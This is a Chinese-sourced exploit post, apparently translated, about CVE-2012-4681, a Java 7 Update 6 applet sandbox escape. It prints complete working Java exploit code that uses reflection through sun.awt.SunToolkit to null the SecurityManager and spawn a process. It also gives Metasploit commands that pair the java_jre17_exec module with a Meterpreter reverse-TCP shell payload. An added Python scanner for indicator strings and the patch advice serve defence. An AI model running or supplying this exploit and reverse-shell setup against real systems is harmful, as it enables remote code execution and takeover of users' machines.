JRE 7u6 applet sandbox bypass leading to arbitrary code execution (0day)

CVE-2012-4681

Description:

A 0day from August. The CVE entry describes it as follows:
It allows remote attackers to craft an applet that calls com.sun.beans.finder.ClassFinder.findClass, thereby bypassing the restrictions of the SecurityManager. It then leverages an exception in the forName method to reach restricted classes in certain packages, such as sun.awt.SunToolkit, and uses the reflection getField method to read and modify private fields.
It was widely exploited in August 2012; the exploit consists of Gondzz.class and Gondvv.class.

Affected versions: Oracle Java SE 7 Update 6 and earlier

Exploit:

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class noGondvv extends Applet
{

    public noGondvv()
    {
    }

    // Builds a Statement for System.setSecurityManager(null) and replaces its
    // private "acc" field with an AccessControlContext that carries AllPermission,
    // so the call executes with full privileges instead of the applet sandbox.
    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    // Resolves a class through java.beans.Expression -> Class.forName. As the
    // description above notes, this path goes through ClassFinder.findClass and
    // escapes the SecurityManager's package-access check, exposing restricted
    // classes such as sun.awt.SunToolkit.
    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    // sun.awt.SunToolkit.getField hands back a Field with access checks already
    // suppressed; it is used here to overwrite a private field.
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            // Proof of concept: once the SecurityManager is gone, spawn a process.
            Process localProcess = Runtime.getRuntime().exec("cmd.exe /c calc.exe");
            if(localProcess != null)
            {
                localProcess.waitFor();
            }
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }
}
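As an added example (not part of the original post, and not code from the Gondvv exploit or from Oracle), the following Python script shows how a defender can triage downloaded applet class files for the two things the description and the listing above hinge on: string and class references to sun.awt.SunToolkit, java.beans.Expression/Statement, ClassFinder and setSecurityManager in the constant pool, and a JRE version falling inside the affected range (Java 7 up to Update 6). The constant-pool walker follows the JVM class-file layout; the SAMPLE_CLASS and BENIGN_CLASS byte strings are constructed by hand to exercise it and are not real compiled classes.

```python
import re
import struct

# Sizes of the fixed-width constant-pool entries (JVM class-file spec, JDK 7 era).
# Tag 1 (CONSTANT_Utf8) is variable-length and handled separately.
CP_FIXED_SIZES = {
    3: 4, 4: 4,           # Integer, Float
    5: 8, 6: 8,           # Long, Double (each occupies two pool slots)
    7: 2, 8: 2,           # Class, String
    9: 4, 10: 4, 11: 4,   # Fieldref, Methodref, InterfaceMethodref
    12: 4,                # NameAndType
    15: 3, 16: 2, 18: 4,  # MethodHandle, MethodType, InvokeDynamic
}

# Names the CVE description says the exploit relies on, in dotted form.
INDICATORS = (
    "sun.awt.SunToolkit",
    "com.sun.beans.finder.ClassFinder",
    "java.beans.Expression",
    "java.beans.Statement",
    "setSecurityManager",
)


def constant_pool_utf8(data):
    """Return every CONSTANT_Utf8 entry of a class file as bytes."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a class file")
    count = struct.unpack_from(">H", data, 8)[0]  # constant_pool_count
    pos, index, entries = 10, 1, []
    while index < count:
        tag = data[pos]
        pos += 1
        if tag == 1:
            length = struct.unpack_from(">H", data, pos)[0]
            entries.append(data[pos + 2:pos + 2 + length])
            pos += 2 + length
        elif tag in CP_FIXED_SIZES:
            pos += CP_FIXED_SIZES[tag]
            if tag in (5, 6):
                index += 1  # Long/Double consume two slots
        else:
            raise ValueError("unknown constant-pool tag %d" % tag)
        index += 1
    return entries


def find_indicators(data):
    """Indicator names present in the constant pool, sorted. Class references are
    stored with '/' separators and string literals with '.', so both are normalised."""
    found = set()
    for entry in constant_pool_utf8(data):
        text = entry.replace(b"/", b".").decode("utf-8", "replace")
        for name in INDICATORS:
            if name in text:
                found.add(name)
    return sorted(found)


def is_affected_jre(version):
    """True for Java 7 builds up to Update 6 (e.g. "1.7.0_06"), the range named above."""
    m = re.match(r"1\.(\d+)\.\d+(?:_(\d+))?", version)
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    major, update = int(m.group(1)), int(m.group(2) or 0)
    return major == 7 and update <= 6


def _utf8(s):
    return b"\x01" + struct.pack(">H", len(s)) + s


# Constructed sample: a minimal class-file prefix whose constant pool mimics what a
# compiled noGondvv.class would carry. Not a real compiled class.
SAMPLE_CLASS = (
    b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 51)   # magic, minor, major (Java 7)
    + struct.pack(">H", 8)                            # constant_pool_count = slots + 1
    + _utf8(b"noGondvv")                              # 1: class name
    + b"\x07" + struct.pack(">H", 1)                  # 2: CONSTANT_Class -> #1
    + b"\x05" + struct.pack(">q", 0)                  # 3-4: CONSTANT_Long (two slots)
    + _utf8(b"java/beans/Expression")                 # 5: class ref, slashed form
    + _utf8(b"sun.awt.SunToolkit")                    # 6: literal passed to forName
    + _utf8(b"setSecurityManager")                    # 7: literal used by the Statement
    + struct.pack(">HHH", 0x0021, 2, 0)               # access_flags, this_class, super_class
)

# Constructed benign sample with nothing suspicious in its pool.
BENIGN_CLASS = (
    b"\xca\xfe\xba\xbe" + struct.pack(">HH", 0, 51)
    + struct.pack(">H", 3)
    + _utf8(b"HelloApplet")
    + _utf8(b"java/lang/Object")
    + struct.pack(">HHH", 0x0021, 1, 2)
)

if __name__ == "__main__":
    print("indicators:", find_indicators(SAMPLE_CLASS))
    print("1.7.0_06 affected:", is_affected_jre("1.7.0_06"))
```

A hit on this scan is a triage signal, not a verdict: legitimate code can reference java.beans.Expression, and an obfuscated dropper can hide these strings. Combine it with the version check on endpoints and, above all, with the upgrade to 7u7 that the fix section below recommends.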

MSF test:

The exploit module can be downloaded here; place it in the corresponding msf3 directory and run reload_all.

msf > use exploit/multi/browser/java_jre17_exec
msf > set PAYLOAD windows/meterpreter/reverse_tcp

Fix:

Official patch: upgrade to JRE 7u7 or later.

Reference:

http://www.2cto.com/Article/201208/151509.html

http://ha.cker.in/794.seo
